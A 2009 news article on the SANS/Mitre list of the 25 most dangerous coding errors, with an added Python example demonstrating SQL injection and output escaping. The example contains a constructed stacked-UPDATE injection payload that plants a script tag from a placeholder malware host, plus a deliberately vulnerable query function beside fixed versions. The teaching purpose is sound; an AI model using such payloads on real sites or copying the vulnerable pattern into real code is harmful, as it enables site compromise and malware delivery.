Unveiled: Top 25 most dangerous code errors

Error, error!

By Tom Espiner

Published: 14 January 2009 08:28 GMT

Security experts from US government agencies, multinational companies and academia have released a list of what they consider to be the 25 most critical errors made while coding software.

Participants from more than 30 organisations worked together to agree on the 25 "most dangerous" errors, the Sans Institute said in a statement on Monday. They included experts from the US National Security Agency, the US Computer Emergency Response Team, Mitre and the Sans Institute, as well as from Apple, Microsoft and Oracle.

The list was released so programmers can check their code for the most common errors that produce security vulnerabilities.

Alan Paller, director of the Sans Institute, told silicon.com sister site ZDNet UK: "[The list] is going to change the way organisations buy software, right away."

The top two coding errors were improper input validation and improper encoding or escaping of output, according to Steven Christey of Mitre, who said those particular errors "earned the top rating for good reason".

Christey said in a statement: "In 2008, hundreds of thousands of innocent, and generally trusted, web pages were modified to serve malware by automated programs that burrowed into databases using SQL injection.

"The attack worked because countless programmers made the exact same [input validation and improper output encoding] mistakes in their software."
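The pair of mistakes Christey describes, shown side by side with their fixes, as an added example that is not part of the original article or of the Sans/Mitre list. It is illustrative Python over an in-memory SQLite database with constructed sample rows; the payload is modelled on the stacked UPDATE used in the 2008 mass injections, with a placeholder host name, and `executescript()` stands in for a database driver that allows several statements per request.

```python
import html
import sqlite3

# Constructed payload in the style of the 2008 mass SQL injection attacks:
# a stacked UPDATE that appends a script tag to every stored page body.
# The host name is a placeholder, not a real site.
PAYLOAD = ("1; UPDATE pages SET body = body || "
           "'<script src=\"http://malware.example/x.js\"></script>'")


def make_db():
    """Constructed sample database: two ordinary, trusted pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO pages (id, body) VALUES (?, ?)",
                     [(1, "Welcome"), (2, "About us")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, page_id):
    """Improper input validation: the request parameter is pasted into the
    SQL text. executescript() mimics a driver that runs stacked statements,
    so the attacker's trailing UPDATE executes along with the SELECT."""
    conn.executescript("SELECT body FROM pages WHERE id = " + page_id)


def lookup_safe(conn, page_id):
    """Fixed: check the input's type and range first, then bind it as a
    query parameter so it can only ever be treated as data."""
    if not page_id.isdigit() or not 1 <= int(page_id) <= 10**9:
        raise ValueError("page id must be a positive integer")
    row = conn.execute("SELECT body FROM pages WHERE id = ?",
                       (int(page_id),)).fetchone()
    return row[0] if row else None


def try_lookup_safe(conn, page_id):
    """Returns ('rejected', None) for invalid input, else ('ok', body)."""
    try:
        return "ok", lookup_safe(conn, page_id)
    except ValueError:
        return "rejected", None


def render(body):
    """Improper output encoding, fixed: escape stored text before putting it
    into HTML, so a body tampered with elsewhere is displayed, not executed."""
    return "<div class=\"page\">" + html.escape(body, quote=True) + "</div>"


def all_bodies(conn):
    """Helper for inspecting the stored pages after each lookup."""
    return [r[0] for r in conn.execute("SELECT body FROM pages ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    lookup_vulnerable(db, PAYLOAD)
    print("after vulnerable lookup:", all_bodies(db))
    print("escaped render:", render(all_bodies(db)[0]))
    db = make_db()
    print("safe lookup:", try_lookup_safe(db, PAYLOAD), all_bodies(db))
```

The two fixes are independent: parameter binding stops the injection from reaching the database, and output escaping keeps a page inert even when its stored content was altered through some other path, which is why the list rates both errors separately.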

The full list of coding errors, and information on how to fix them, is available from the Sans Institute website.

Original article: Top 25 'most dangerous' coding errors revealed from ZDNet UK
